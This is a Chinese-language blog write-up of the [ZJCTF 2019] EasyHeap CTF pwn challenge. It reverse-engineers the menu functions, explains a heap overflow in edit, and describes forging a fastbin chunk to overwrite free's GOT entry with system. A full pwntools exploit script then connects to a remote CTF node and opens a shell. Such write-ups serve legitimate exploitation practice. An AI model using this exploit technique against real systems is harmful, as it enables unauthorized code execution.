zoukankan      html  css  js  c++  java
  • [ZJCTF 2019]EasyHeap

    逆向分析

    --------------------------------
           Easy Heap Creator       
    --------------------------------
     1. Create a Heap               
     2. Edit a Heap                 
     3. Delete a Heap               
     4. Exit                        
    --------------------------------
    Your choice :
    
    

    create 函数

        heaparray[i] = malloc(size);
        read_input(heaparray[i], size);
    
    • heaparray[i]:存放 chunk 的地址。
    • read_input(heaparray[i], size):向 chunk 写入 size 大小的内容。

    edit 函数

        read_input(heaparray[v2], v0);
    
    • read_input(heaparray[v2], v0):向 chunk 中写入 v0 大小的内容,也就是说如果 v0 比 create 时的 size 大的话就会造成堆溢出。

    delete 函数

        free(heaparray[v1]);
        heaparray[v1] = 0LL;
    
    • free 掉对应 chunk 且指针置 0 了。

    利用思路

    • 创建3个 chunk ,chunk 0 1 2 ,chunk 1 的内容为 /bin/sh 。
    • 我们可以用 house of spirit 技术,伪造 chunk 至 heaparray 附近,这样操作在 malloc fastbin 时需要绕过大小判断,我们可以巧妙地利用地址开头 7f 来伪造大小为 0x70 的 fastbin 。
    gdb-peda$ x /20xw 0x6020a0 - 3
    0x60209d:	0x20000000	0x242d0af6	0x0000007f	0x00000000
    0x6020ad:	0xe0000000	0x242d0ae8	0x0000007f	0x00000000
    0x6020bd:	0x00000000	0x00000000	0x00000000	0x00000000
    0x6020cd:	0x00000000	0x00000000	0x00000000	0x00000000
    0x6020dd:	0x10000000	0x0000d7b0	0x80000000	0x0000d7b0
    
    
    • 然后通过伪造的 fastbin 输入内容覆盖 chunk 0 的地址为 free_got 的地址。
    • 通过编辑 chunk 0 将 free_got 地址改为 system 的地址。
    • 这样 free chunk 1 就会执行 system('/bin/sh') 拿 shell。

    exp 脚本

    from pwn import *
    
    #p = process('./easyheap')
    p = remote('node3.buuoj.cn',26672)
    elf =ELF('./easyheap')
    
    context.log_level = 'debug'
    
    def create(size,content):
    	p.recvuntil('Your choice :')
    	p.sendline('1')
    	p.recvuntil('Size of Heap : ')
    	p.send(str(size))
    	p.recvuntil('Content of heap:')
    	p.send(str(content))	
    
    def edit(index,size,content):
    	p.recvuntil('Your choice :')
    	p.sendline('2')
    	p.recvuntil('Index :')
    	p.sendline(str(index))
    	p.recvuntil('Size of Heap : ')
    	p.send(str(size))
    	p.recvuntil('Content of heap : ')
    	p.send(str(content))
    
    def free(index):
    	p.recvuntil('Your choice :')
    	p.sendline('3')
    	p.recvuntil('Index :')
    	p.sendline(str(index))
    
    free_got = elf.got['free']
    
    create(0x68,'aaaa')
    create(0x68,'bbbb')
    create(0x68,'cccc')
    free(2)
    
    #gdb.attach(p)
    
    payload = '/bin/shx00' + 'a' * 0x60 + p64(0x71) + p64(0x6020b0-3)
    edit(1,len(payload),payload)
    
    create(0x68,'aaaa')
    create(0x68,'c')
    
    payload = 'xaa' * 3 + p64(0) * 4 + p64(free_got)
    edit(3,len(payload),payload)
    payload = p64(elf.plt['system'])
    
    #gdb.attach(p)
    
    edit(0,len(payload),payload)
    free(1)
    
    #gdb.attach(p)
    
    p.interactive()
    
    

    get flag

    内容来源

    buuctf pwn | summerN's blog

  • 相关阅读:
    EL+Serilog日志
    HttpClientFactory-向外请求的最佳
    Autofac依赖注入
    .Net Core MemoryCache
    时间复杂度和空间复杂度
    中间件-异常处理
    依赖注入-1
    使用并发集合
    安卓刷机&root
    Mac Android Studio 常用快捷键大全
  • 原文地址:https://www.cnblogs.com/luoleqi/p/12395985.html
Copyright © 2011-2022 走看看